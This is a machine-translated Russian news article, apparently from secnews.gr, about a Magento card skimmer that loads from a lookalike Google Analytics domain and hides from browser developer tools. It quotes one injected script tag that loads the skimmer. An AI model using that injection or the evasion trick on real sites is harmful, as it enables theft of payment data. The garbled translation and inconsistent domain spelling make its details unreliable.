Воскресенье, 27 сентября, 14:20
дома безопасность Вредоносные домены Google используются при атаках скиммеров

Вредоносные домены Google используются при атаках скиммеров

шумовкаΟι Преступники из киберпространства нашли новый способ украсть деньги пользователями, которые делают онлайн сделки. Хакеры используют это ложные домены, которые должны быть Google, и привести пользователей к нарушающим права сайтов. Видя это доменпользователи считают сайт безопасным. Некоторые исследователи Sucuri вступили в контакт с владельцем веб-сайта Magento, и им сообщили, что домен был заражен шумовка кредитные карты Скиммер использует код JavaScript, который содержит ссылку на него злонамеренный адрес google-analytîcs [.] Com.

Вот пример злого код:

<script type = "text / javascript" src = "//google-analytics.com/www.[redacted]/3f5cf4657d5d9.js"> </ script>

Исследователи сказали, что Хакеры они используют авторитетные имена, такие как GoogleПоэтому посетители считают, что сайты безопасны. Но они не обращают внимания на то, что есть один дифференциация доменов, что указывает на то, что это вредоносный сайт.

Исследователи обнаружили, что определенный скиммер похож на другие, которые циркулируют и хранят данные, импортированные, а также параметры выпадающего меню.

Однако скиммер проверяет, используются ли инструменты разработчика в Google Chrome или в Mozilla Firefox. Если используется, он не будет пытаться украсть какую-либо информацию, чтобы избежать обнаружения.

Если инструменты разработчика не найдены, они крадут информацию и отправляют ее на удаленный компьютер. сервер.

Скиммеры для карт устанавливаются через уязвимые сайты электронной коммерции и представляют собой серьезную и частую проблему. В июле компания-разработчик RiskIQ заявила, что это недавно кампания удалось за несколько месяцев заразить более чем 17.000 веб-сайты вредоносным программным обеспечением для удаления карточек.

Пользователи Magento, такие как WordPress и другие Drupal они должны постоянно обновлять свое программное обеспечение. Домены Magento являются целью хакеров, пытающихся украсть экономические данные. Отчет показал, что 2018, 83% веб-сайтов Magento, признанных уязвимыми для скиммеров карт.

ОСТАВИТЬ ОТВЕТ

Пожалуйста, введите ваш комментарий!
Пожалуйста, введите ваше имя здесь

Отсутствующая Миа
Отсутствующая Миаhttps://www.secnews.gr
Быть самим собой в мире, который постоянно пытается изменить вас, является вашим величайшим достижением

ЖИВЫЕ НОВОСТИ

Бизнес - COVID-19: хранилище в облаке VS дата-центры!

Пандемия COVID-19 изменила данные для компаний по всему миру, в результате чего им пришлось изменить как ...

Как использовать приложение Apple Translate на вашем iPhone?

Приложение Apple Translate, представленное в iOS 14, позволяет пользователям iPhone ...

Как отключить частные MAC-адреса Wi-Fi

Apple изменила способ подключения iPhone и iPad к сетям Wi-Fi, начиная с обновлений iOS 14 и iPadOS 14 ....

Mac: узнайте, как переименовать сразу несколько файлов!

Многим людям сложнее переименовать файлы на Mac, чем переименовать Windows. Искатель ...

Как вы можете контролировать производительность вашего Chromebook?

Часто пользователи задаются вопросом о производительности своего компьютера и хотели бы взглянуть на систему ...

Как обнаружить скрытые камеры наблюдения с помощью телефона

Во время отпуска или командировок мы вынуждены останавливаться в отелях или Airbnb ....

Как играть в скрытую игру на Android 11

Google обычно включает так называемые «пасхальные яйца» в каждую новую версию Android, которая выпускается. А Android 11 нет ...
00: 01: 49

Кольцо: новое устройство Amazon - дрон с камерой наблюдения

Amazon готова выпустить новую камеру видеонаблюдения Ring, установленную на летающем дроне.

Разработчики программного обеспечения были очень продуктивными во время пандемии

Согласно новому исследованию, производительность большинства команд по разработке программного обеспечения увеличилась во время кризиса пандемии Covid-19. Но если ты ...

Cisco: 25 серьезных дефектов в программном обеспечении IOS и IOS XE

Cisco предупреждает клиентов, использующих программное обеспечение IOS и ISO XE, о необходимости применения обновлений для 25 уязвимостей высокого уровня безопасности ...